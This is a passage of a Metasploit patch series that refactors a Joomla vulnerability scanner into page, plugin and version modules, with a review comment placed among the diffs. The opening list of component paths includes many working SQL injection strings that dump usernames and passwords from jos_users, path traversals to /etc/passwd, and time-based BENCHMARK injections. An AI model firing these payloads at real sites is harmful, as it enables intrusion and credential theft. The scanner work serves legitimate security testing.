-components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php -components/com_hwdvideoshare/ -components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1"); -components/com_ice/ -components/com_idoblog/ -components/com_idvnews/ -components/com_ignitegallery/ -components/com_ijoomla_archive/ -components/com_ijoomla_rss/ -components/com_inter/ -components/com_ionfiles/ -components/com_is/ -components/com_ixxocart/ -components/com_jabode/ -components/com_jashowcase/ -components/com_jb2/ -components/com_jce/ -components/com_jcs/ -components/com_jd-wiki/ -components/com_jd-wp/ -components/com_jim/ -components/com_jjgallery/ -components/com_jmovies/ -components/com_jobline/ -components/com_jombib/ -components/com_joobb/ -components/com_jooget/ -components/com_joom12pic/ -components/com_joomla-visites/ -components/com_joomla_flash_uploader/ -components/com_joomlaboard/ -components/com_joomladate/ -components/com_joomlaflashfun/ -components/com_joomlalib/ -components/com_joomlaradiov5/ -components/com_joomlavvz/ -components/com_joomlaxplorer/ -components/com_joomloads/ -components/com_joomradio/ -components/com_joomtracker/ -components/com_joovideo/ -components/com_jotloader/ -components/com_journal/ -components/com_jpack/ -components/com_jpad/ -components/com_jreactions/ -components/com_jreviews/scripts/xajax.inc.php -components/com_jumi/ -components/com_juser/ -components/com_jvideo/ -components/com_k2/ -components/com_kbase/ -components/com_knowledgebase/fckeditor/fckeditor.js -components/com_kochsuite / -components/com_kunena/ -components/com_letterman/ -components/com_lexikon/ -components/com_linkdirectory/ -components/com_listoffreeads/ -components/com_livechat/getSavedChatRooms.php -components/com_livechat/xmlhttp.php -components/com_liveticker/ -components/com_lm/ -components/com_lmo/ -components/com_loudmounth/includes/abbc/abbc.class.php -components/com_loudmouth/ -components/com_lowcosthotels/ 
-components/com_lurm_constructor/admin.lurm_constructor.php -components/com_mad4joomla/ -components/com_madeira/img.php -components/com_maianmusic/ -components/com_mailarchive/ -components/com_mailto/ -components/com_mambatstaff/mambatstaff.php -components/com_mambelfish/ -components/com_mambospgm/ -components/com_mambowiki/MamboLogin.php -components/com_marketplace/ -components/com_mcquiz/ -components/com_mdigg/ -components/com_media_library/ -components/com_mediaslide/ -components/com_mezun/ -components/com_mgm/ -components/com_minibb/ -components/com_misterestate/ -components/com_mmp/help.mmp.php -components/com_model/ -components/com_moodle/moodle.php -components/com_moofaq/ -components/com_mosmedia/ -components/com_mospray/scripts/admin.php -components/com_mosres/ -components/com_most/ -components/com_mp3_allopass/ -components/com_mtree/ -components/com_mtree/img/listings/o/{id}.php -components/com_multibanners/extadminmenus.class.php -components/com_myalbum/ -components/com_mycontent/ -components/com_mydyngallery/ -components/com_mygallery/ -components/com_n-forms/ -components/com_na_content/ -components/com_na_mydocs/ -components/com_na_newsdescription/ -components/com_na_qforms/ -components/com_neogallery/ -components/com_neorecruit/ -components/com_neoreferences/ -components/com_netinvoice/ -components/com_news/ -components/com_news_portal/ -components/com_newsflash/ -components/com_nfn_addressbook/ -components/com_nicetalk/ -components/com_noticias/ -components/com_omnirealestate/ -components/com_omphotogallery/ -components/com_ongumatimesheet20/ -components/com_onlineflashquiz/ -components/com_ownbiblio/ -components/com_panoramic/ -components/com_paxgallery/ -components/com_paxxgallery/ -components/com_pcchess/ -components/com_pcchess/include.pcchess.php -components/com_pccookbook/ -components/com_pccookbook/pccookbook.php -components/com_peoplebook/param.peoplebook.php -components/com_performs/ -components/com_philaform/ 
-components/com_phocadocumentation/ -components/com_php/ -components/com_phpshop/toolbar.phpshop.html.php -components/com_pinboard/ -components/com_pms/ -components/com_poll/ -components/com_pollxt/ -components/com_ponygallery/ -components/com_portafolio/ -components/com_portfol/ -components/com_prayercenter/ -components/com_pro_desk/ -components/com_prod/ -components/com_productshowcase/ -components/com_profiler/ -components/com_projectfork/ -components/com_propertylab/ -components/com_puarcade/ -components/com_publication/ -components/com_quiz/ -components/com_rapidrecipe/ -components/com_rdautos/ -components/com_realestatemanager/ -components/com_recly/ -components/com_referenzen/ -components/com_rekry/ -components/com_remository/admin.remository.php -components/com_remository_files/file_image_14/1276100016shell.php -components/com_reporter/processor/reporter.sql.php -components/com_resman/ -components/com_restaurante/ -components/com_ricette/ -components/com_rsfiles/ -components/com_rsgallery/ -components/com_rsgallery2/ -components/com_rss/ -components/com_rssreader/ -components/com_rssxt/ -components/com_rwcards/ -components/com_school/ -components/com_search/ -components/com_sebercart/getPic.php?p=[LFD]%00 -components/com_securityimages/ -components/com_sef/ -components/com_seminar/ -components/com_serverstat/install.serverstat.php -components/com_sg/ -components/com_simple_review/ -components/com_simpleboard/ -components/com_simplefaq/ -components/com_simpleshop/ -components/com_sitemap/sitemap.xml.php -components/com_slideshow/ -components/com_smf/ -components/com_smf/smf.php -components/com_swmenupro/ -components/com_team/ -components/com_tech_article/ -components/com_thopper/ -components/com_thyme/ -components/com_tickets/ -components/com_tophotelmodule/ -components/com_tour_toto/ -components/com_trade/ -components/com_uhp/ -components/com_uhp2/ -components/com_user/controller.php -components/com_users/ 
-components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php -components/com_vehiclemanager/ -components/com_versioning / -components/com_videodb/core/videodb.class.xml.php -components/com_virtuemart/ -components/com_volunteer/ -components/com_vr/ -components/com_waticketsystem/ -components/com_webhosting/ -components/com_weblinks/ -components/com_webring/ -components/com_wmtgallery/ -components/com_wmtportfolio/ -components/com_x-shop/ -components/com_xevidmegahd/ -components/com_xewebtv/ -components/com_xfaq/ -components/com_xgallery/helpers/img.php?file= -components/com_xsstream-dm/ -components/com_ynews/ -components/com_yvcomment/ -components/com_zoom/classes/ -components/mod_letterman/ -components/remository/ -eXtplorer/ -easyblog/entry/uncategorized -extplorer/ -http://{target}/components/com_mtree/img/listings/o/{id}.php where {id} -includes/joomla.php -index.php/404' -index.php/?option=com_question&catID=21' and+1=0 union all -index.php/image-gallery/">/25-koala -index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1 -index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view -index.php?option=com_aardvertiser&cat_name=conf&task=<= -index.php?option=com_aardvertiser&task= -index.php?option=com_abc&view=abc&letter=AS§ionid=' -index.php?option=com_advert&id=36' -index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users-- -index.php?option=com_alfurqan15x&action=viewayat&surano= -index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version -index.php?option=com_annonces&view=edit&Itemid=1 -index.php?option=com_articleman&task=new -index.php?option=com_bbs&bid=-1 -index.php?option=com_beamospetition&startpage=3&pet=- -index.php?option=com_beamospetition&startpage=3&pet=-1+Union+select+user()+from+jos_users- -index.php?option=com_bearleague&task=team&tid=8&sid=1&Itemid=%27 
-index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00 -index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 -index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00 -index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=-1 -index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users-- -index.php?option=com_chronoconnectivity&itemid=1 -index.php?option=com_chronocontact&itemid=1 -index.php?option=com_cinema&Itemid=S@BUN&func=detail&id= -index.php?option=com_clantools&squad=1+ -index.php?option=com_clantools&task=clanwar&showgame=1+ -index.php?option=com_commedia&format=raw&task=image&pid=4&id=964' -index.php?option=com_commedia&task=page&commpid=21 -index.php?option=com_connect&view=connect&controller= -index.php?option=com_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../../ -index.php?option=com_delicious&controller=../../../../../../../../../../etc/passwd%00 -index.php?option=com_dioneformwizard&controller=[LFI]%00 -index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=-1 -index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12 -index.php?option=com_easyfaq&Itemid=1&task=view&gid= -index.php?option=com_easyfaq&catid=1&task=view&id=-2527+ -index.php?option=com_easyfaq&task=view&contact_id= -index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id= -index.php?option=com_equipment&task=components&id=45&sec_men_id= -index.php?option=com_equipment&view=details&id= -index.php?option=com_estateagent&Itemid=47&act=object&task=showEO&id=[sqli] -index.php?option=com_etree&view=displays&layout=category&id=[SQL] -index.php?option=com_etree&view=displays&layout=user&user_id=[SQL] 
-index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1 -index.php?option=com_fabrik&view=table&tableid=13+union+select+1---- -index.php?option=com_filecabinet&task=download&cid[]=7 -index.php?option=com_firmy&task=section_show_set&Id=-1 -index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R -index.php?option=com_golfcourseguide&view=golfcourses&cid=1&id= -index.php?option=com_graphics&controller= -index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0&data_search= -index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0?data_search=&rpp= -index.php?option=com_huruhelpdesk&view=detail -index.php?option=com_huruhelpdesk&view=detail&cid[0]= -index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1 -index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1 -index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2 -index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1 -index.php?option=com_iproperty&view=agentproperties&id= -index.php?option=com_jacomment&view= -index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00 -index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00 -index.php?option=com_jcommunity&controller=members&task=1' -index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13 -index.php?option=com_jefaqpro&view=category&layout=categorylist&catid=2 -index.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&catid=2 -index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00 -index.php?option=com_jeguestbook&view=item_detail&d_itemid=-1 OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999,NULL),NULL))) -index.php?option=com_jfuploader&Itemid= -index.php?option=com_jgen&task=view&id= 
-index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00 -index.php?option=com_jimtawl&Itemid=12&task= -index.php?option=com_jmarket&controller=product&task=1' -index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=1' -index.php?option=com_jomdirectory&task=search&type=111+ -index.php?option=com_joomdle&view=detail&cat_id=1&course_id= -index.php?option=com_joomla_flash_uploader&Itemid=1 -index.php?option=com_joomleague&func=showNextMatch&p=[sqli] -index.php?option=com_joomleague&view=resultsmatrix&p=4&Itemid=[sqli] -index.php?option=com_joomtouch&controller= -index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00 -index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00 -index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users -index.php?option=com_jstore&controller=product-display&task=1' -index.php?option=com_jsubscription&controller=subscription&task=1' -index.php?option=com_jtickets&controller=ticket&task=1' -index.php?option=com_konsultasi&act=detail&sid= -index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en -index.php?option=com_kunena&func=userlist&search= -index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1' -index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00 -index.php?option=com_markt&page=show_category&catid=7+union+select+0,1,password,3,4,5,username,7,8+from+jos_users-- -index.php?option=com_matamko&controller= -index.php?option=com_myhome&task=4&nidimmindex.php?option=com_myhome&task=4&nidimm -index.php?option=com_neorecruit&task=offer_view&id= -index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users-- -index.php?option=com_noticeboard&controller= 
-index.php?option=com_obsuggest&controller= -index.php?option=com_ongallery&task=ft&id=-1+order+by+1-- -index.php?option=com_ongallery&task=ft&id=-1+union+select+1-- -index.php?option=com_oziogallery&Itemid= -index.php?option=com_page&id=53 -index.php?option=com_pbbooking&task=validate&id=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(999999999,NULL),NULL))) -index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00 -index.php?option=com_peliculas&view=peliculas&id=null[Sql Injection] -index.php?option=com_phocagallery&view=categories&Itemid= -index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) -index.php?option=com_php&file=../../../../../../../../../../etc/passwd -index.php?option=com_php&file=../images/phplogo.jpg -index.php?option=com_php&file=../js/ie_pngfix.js -index.php?option=com_ponygallery&Itemid=[sqli] -index.php?option=com_products&catid=-1 -index.php?option=com_products&id=-1 -index.php?option=com_products&product_id=-1 -index.php?option=com_products&task=category&catid=-1 -index.php?option=com_properties&task=agentlisting&aid= -index.php?option=com_qcontacts&Itemid=1' -index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts -index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00 -index.php?option=com_restaurantguide&view=country&id='&Itemid=69 -index.php?option=com_rokmodule&tmpl=component&type=raw&module=1' -index.php?option=com_seyret&view= -index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users-- -index.php?option=com_smartsite&controller= -index.php?option=com_spa&view=spa_product&cid= -index.php?option=com_spidercalendar -index.php?option=com_spidercalendar&date=1' 
-index.php?option=com_spielothek&task=savebattle&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) -index.php?option=com_spielothek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) -index.php?option=com_spielothek&view=battle&wtbattle=play&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) -index.php?option=com_staticxt&staticfile=test.php&id=1923 -index.php?option=com_szallasok&mode=8&id=25 (SQL) -index.php?option=com_tag&task=tag&tag= -index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users-- -index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password) FROM jos_users -index.php?option=com_ultimateportfolio&controller= -index.php?option=com_users&view=registration -index.php?option=com_virtuemart&page=account.index&keyword=[sqli] -index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00 -index.php?option=com_x-shop&action=artdetail&idd=' -index.php?option=com_x-shop&action=artdetail&idd='[SQLi] -index.php?option=com_xcomp&controller=../../[LFI]%00 -index.php?option=com_xvs&controller=../../[LFI]%00 -index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--+Union+select+user()+from+jos_users-- -index.php?option=com_yjcontactus&view= -index.php?option=com_youtube&id_cate=4 -index.php?option=com_zina&view=zina&Itemid=9 -index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id= -index.php?search=NoGe&option=com_esearch&searchId= -index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube 
-index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+jos_users-- -js/index.php?option=com_socialads&view=showad&Itemid=94 -libraries/joomla/utilities/compat/php50x.php -libraries/pcl/pcltar.php -libraries/phpmailer/phpmailer.php -libraries/phpxmlrpc/xmlrpcs.php -modules/mod_artuploader/upload.php"); -modules/mod_as_category.php -modules/mod_calendar.php -modules/mod_ccnewsletter/helper/popup.php?id=[SQLi] -modules/mod_dionefileuploader/upload.php?module_dir=./&module_max=2097152&file_type=application/octet-stream"); -modules/mod_jfancy/script.php"); -modules/mod_ppc_simple_spotlight/elements/upload_file.php -modules/mod_ppc_simple_spotlight/img/ -modules/mod_pxt/ -modules/mod_quick_question.php -modules/mod_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0 -patch/makedown.php?arquivo=../../../../etc/passwd -plugins/content/efup_files/helper.php"); -plugins/editors/idoeditor/themes/advanced/php/image.php" method="post" enctype="multipart/form-data"> -plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/ -plugins/editors/xstandard/attachmentlibrary.php -print.php?task=person&id=36 and 1=1 -templates/be2004-2/ -templates/ja_purity/ -wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1-- -web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=1' \ No newline at end of file diff --git a/modules/auxiliary/scanner/http/joomla_vulnscan.rb b/modules/auxiliary/scanner/http/joomla_vulnscan.rb index 7b497d1846..798496cb74 100755 --- a/modules/auxiliary/scanner/http/joomla_vulnscan.rb +++ b/modules/auxiliary/scanner/http/joomla_vulnscan.rb 
@@ -101,7 +101,7 @@ class Metasploit3 < Msf::Auxiliary 'language/en-GB/en-GB.ini','htaccess.txt', 'language/en-GB/en-GB.com_media.ini'] iapps = ['robots.txt','administrator/index.php','admin/','index.php/using-joomla/extensions/components/users-component/registration-form', 'index.php/component/users/?view=registration','htaccess.txt'] - + apps.each do |app| app_status = check_app(tpath, app, ip) return if app_status == :abort From 6cdb1a80de61b46853401ef971d7bd470c52ad81 Mon Sep 17 00:00:00 2001 From: f8lerror Date: Thu, 24 Jan 2013 09:47:20 -0500 Subject: [PATCH 5/7] Remove app from fingerprint and blank line --- modules/auxiliary/scanner/http/joomla_vulnscan.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/http/joomla_vulnscan.rb b/modules/auxiliary/scanner/http/joomla_vulnscan.rb index 798496cb74..1c465719f1 100755 --- a/modules/auxiliary/scanner/http/joomla_vulnscan.rb +++ b/modules/auxiliary/scanner/http/joomla_vulnscan.rb @@ -52,7 +52,7 @@ class Metasploit3 < Msf::Auxiliary return os end - def fingerprint(response, app) + def fingerprint(response) if(response.body =~ /(.+)<\/version\/?>/i) v = $1 out = (v =~ /^6/) ? "Joomla #{v}" : " #{v}" @@ -101,7 +101,6 @@ class Metasploit3 < Msf::Auxiliary 'language/en-GB/en-GB.ini','htaccess.txt', 'language/en-GB/en-GB.com_media.ini'] iapps = ['robots.txt','administrator/index.php','admin/','index.php/using-joomla/extensions/components/users-component/registration-form', 'index.php/component/users/?view=registration','htaccess.txt'] - apps.each do |app| app_status = check_app(tpath, app, ip) return if app_status == :abort @@ -137,7 +136,7 @@ class Metasploit3 < Msf::Auxiliary res.body.gsub!(/[\r|\n]/, ' ') os = osfingerprint(res) if (res.code == 200) - out = fingerprint(res,app) + out = fingerprint(res) return if not out if(out =~ /Unknown Joomla/) print_error("#{peer} - Unable to identify Joomla Version with this file #{app}") 
From dd1ce34ecc202d865f724984c7bb55f6ba17dbaa Mon Sep 17 00:00:00 2001 From: f8lerror Date: Thu, 24 Jan 2013 17:04:22 -0500 Subject: [PATCH 6/7] Made recommended changes removed short timeout added returns and other small changes --- .../auxiliary/scanner/http/joomla_vulnscan.rb | 49 ++++++++++--------- 1 file changed, 27 insertions(+), 22 deletions(-) diff --git a/modules/auxiliary/scanner/http/joomla_vulnscan.rb b/modules/auxiliary/scanner/http/joomla_vulnscan.rb index 1c465719f1..2ad9d2f040 100755 --- a/modules/auxiliary/scanner/http/joomla_vulnscan.rb +++ b/modules/auxiliary/scanner/http/joomla_vulnscan.rb @@ -23,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary 'Description' => %q{ This module scans a Joomla install for information, plugins and potential vulnerabilites. }, - 'Author' => [ 'f8lerror' ], + 'Author' => [ 'newpid0' ], 'License' => MSF_LICENSE ) register_options( 
@@ -101,22 +101,23 @@ class Metasploit3 < Msf::Auxiliary 'language/en-GB/en-GB.ini','htaccess.txt', 'language/en-GB/en-GB.com_media.ini'] iapps = ['robots.txt','administrator/index.php','admin/','index.php/using-joomla/extensions/components/users-component/registration-form', 'index.php/component/users/?view=registration','htaccess.txt'] + vprint_status("#{peer} - Checking Joomla version") apps.each do |app| app_status = check_app(tpath, app, ip) return if app_status == :abort break if app_status end - vprint_status("#{peer} - Checking host for interesting pages") + vprint_status("#{peer} - Checking for interesting pages") iapps.each do |iapp| scan_pages(tpath,iapp,ip) end if datastore['ENUMERATE'] - vprint_status("#{peer} - Checking host for interesting plugins") + vprint_status("#{peer} - Checking for interesting plugins") bres = send_request_cgi({ 'uri' => tpath, 'method' => 'GET', }, 5) - return false if not bres or not bres.body or not bres.code + return if not bres or not bres.body or not bres.code bres.body.gsub!(/[\r|\n]/, ' ') File.open(datastore['PLUGINS'], 'rb').each_line do |bapp| papp = bapp.chomp @@ -129,10 +130,9 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => "#{tpath}" << app, 'method' => 'GET', - }, 5) + }) return :abort if res.nil? - return false if not res or not res.body or not res.code - vprint_status("#{peer} - Checking host for version information") + return if not res or not res.body or not res.code res.body.gsub!(/[\r|\n]/, ' ') os = osfingerprint(res) if (res.code == 200) @@ -151,7 +151,7 @@ class Metasploit3 < Msf::Auxiliary :ntype => 'Joomla Version', :data => out ) - return :next_app + return true end elsif(res.code == 403) if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) 
@@ -163,25 +163,26 @@ class Metasploit3 < Msf::Auxiliary else vprint_status("#{ip} denied access to #{ip} #{res.code} #{res.message}") end - + else + return end rescue OpenSSL::SSL::SSLError vprint_error("#{peer} - SSL error") - return :abort + return rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError vprint_error("#{peer} - Unable to Connect") - return :abort + return rescue ::Timeout::Error, ::Errno::EPIPE vprint_error("#{peer} - Timeout error") - return :abort + return end def scan_pages(tpath, iapp, ip) res = send_request_cgi({ 'uri' => "#{tpath}" << iapp, 'method' => 'GET', - }, 5) - return false if not res or not res.body or not res.code + }) + return if not res or not res.body or not res.code res.body.gsub!(/[\r|\n]/, ' ') if (res.code == 200) if(res.body =~ /Administration Login/ and res.body =~ /\(\'form-login\'\)\.submit/ or res.body =~/administration console/) @@ -213,23 +214,25 @@ class Metasploit3 < Msf::Auxiliary else vprint_status("#{ip} ip access to #{ip} #{res.code} #{res.message}") end + else + return end rescue OpenSSL::SSL::SSLError vprint_error("#{peer} - SSL error") - return :abort + return rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError vprint_error("#{peer} - Unable to Connect") - return :abort + return rescue ::Timeout::Error, ::Errno::EPIPE vprint_error("#{peer} - Timeout error") - return :abort + return end def plugin_search(tpath, papp, ip, bres) res = send_request_cgi({ 'uri' => "#{tpath}" << papp, 'method' => 'GET', - }, 5) + }) return if not res or not res.body or not res.code res.body.gsub!(/[\r|\n]/, ' ') osize = bres.body.size 
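Review bot: Changing the three rescue clauses in check_app from `return :abort` to a bare `return` makes the `return if app_status == :abort` guard in run_host unreachable for SSL errors, refused connections and timeouts, so a host that cannot be reached at all now has every fingerprint file in `apps` attempted in turn instead of being skipped after the first failure. Only the `res.nil?` path still yields `:abort`; if send_request_cgi lets these exceptions propagate, as the module's own rescue list anticipates, the earlier `return :abort` was the right value and should be restored at least in the `Rex::ConnectionRefused`/`Rex::HostUnreachable` clause. The added `else return end` branches are no-ops, since the method already falls off the end with nil. The enclosing check_app method starts in the previous hunk, and this file is deleted by the following patch in the series, so the same check belongs in whichever module inherits this rescue block.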
@@ -279,18 +282,20 @@ class Metasploit3 < Msf::Auxiliary vprint_status("#{ip} requires a SSL client certificate") else vprint_status("#{ip} denied access to #{ip}#{tpath}#{papp} - #{res.code} #{res.message}") - end + end + else + return end rescue OpenSSL::SSL::SSLError vprint_error("#{peer} - SSL error") - return :abort + return rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError vprint_error("#{peer} - Unable to Connect") - return :abort + return rescue ::Timeout::Error, ::Errno::EPIPE vprint_error("#{peer} - Timeout error") - return :abort + return end From d6e9f891ea566c316cf398abe0a507019544a28d Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 25 Jan 2013 20:44:49 +0100 Subject: [PATCH 7/7] Proposal for joomla-scanner --- .../auxiliary/scanner/http/joomla_pages.rb | 109 +++++++ .../auxiliary/scanner/http/joomla_plugins.rb | 175 ++++++++++ .../auxiliary/scanner/http/joomla_version.rb | 176 ++++++++++ .../auxiliary/scanner/http/joomla_vulnscan.rb | 303 ------------------ 4 files changed, 460 insertions(+), 303 deletions(-) create mode 100755 modules/auxiliary/scanner/http/joomla_pages.rb create mode 100755 modules/auxiliary/scanner/http/joomla_plugins.rb create mode 100755 modules/auxiliary/scanner/http/joomla_version.rb delete mode 100755 modules/auxiliary/scanner/http/joomla_vulnscan.rb diff --git a/modules/auxiliary/scanner/http/joomla_pages.rb b/modules/auxiliary/scanner/http/joomla_pages.rb new file mode 100755 index 0000000000..77218063a5 --- /dev/null +++ b/modules/auxiliary/scanner/http/joomla_pages.rb 
@@ -0,0 +1,109 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + # Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to + # Joomscan and various MSF modules for code examples. + def initialize + super( + 'Name' => 'Joomla Version Scanner', + 'Description' => %q{ + This module scans a Joomla install for common pages. + }, + 'Author' => [ 'newpid0' ], + 'License' => MSF_LICENSE + ) + register_options( + [ + OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/']) + ], self.class) + end + + def peer + return "#{rhost}:#{rport}" + end + + def run_host(ip) + tpath = normalize_uri(target_uri.path) + if tpath[-1,1] != '/' + tpath += '/' + end + + pages = [ + 'robots.txt', + 'administrator/index.php', + 'admin/', + 'index.php/using-joomla/extensions/components/users-component/registration-form', + 'index.php/component/users/?view=registration', + 'htaccess.txt' + ] + + vprint_status("#{peer} - Checking for interesting pages") + pages.each do |page| + scan_pages(tpath, page, ip) + end + + end + + def scan_pages(tpath, page, ip) + res = send_request_cgi({ + 'uri' => "#{tpath}#{page}", + 'method' => 'GET', + }) + return if not res or not res.body or not res.code + res.body.gsub!(/[\r|\n]/, ' ') + + if (res.code == 200) + note = "Page Found" + if (res.body =~ /Administration Login/ and res.body =~ /\(\'form-login\'\)\.submit/ or res.body =~/administration console/) + note = "Administrator Login Page" + elsif (res.body =~/Registration/ and res.body =~/class="validate">Register<\/button>/) + note = "Registration Page" + end + + print_good("#{peer} - #{note}: 
#{tpath}#{page}") + + report_note( + :host => ip, + :port => datastore['RPORT'], + :proto => 'http', + :ntype => 'joomla_page', + :data => "#{note}: #{tpath}#{page}", + :update => :unique_data + ) + elsif (res.code == 403) + if (res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) + vprint_status("#{ip} denied access to #{ip} (SSL Required)") + elsif (res.body =~ /has a list of IP addresses that are not allowed/) + vprint_status("#{ip} restricted access by IP") + elsif (res.body =~ /SSL client certificate is required/) + vprint_status("#{ip} requires a SSL client certificate") + else + vprint_status("#{ip} ip access to #{ip} #{res.code} #{res.message}") + end + end + + return + + rescue OpenSSL::SSL::SSLError + vprint_error("#{peer} - SSL error") + return + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + vprint_error("#{peer} - Unable to Connect") + return + rescue ::Timeout::Error, ::Errno::EPIPE + vprint_error("#{peer} - Timeout error") + return + end + +end diff --git a/modules/auxiliary/scanner/http/joomla_plugins.rb b/modules/auxiliary/scanner/http/joomla_plugins.rb new file mode 100755 index 0000000000..37dff56fd4 --- /dev/null +++ b/modules/auxiliary/scanner/http/joomla_plugins.rb 
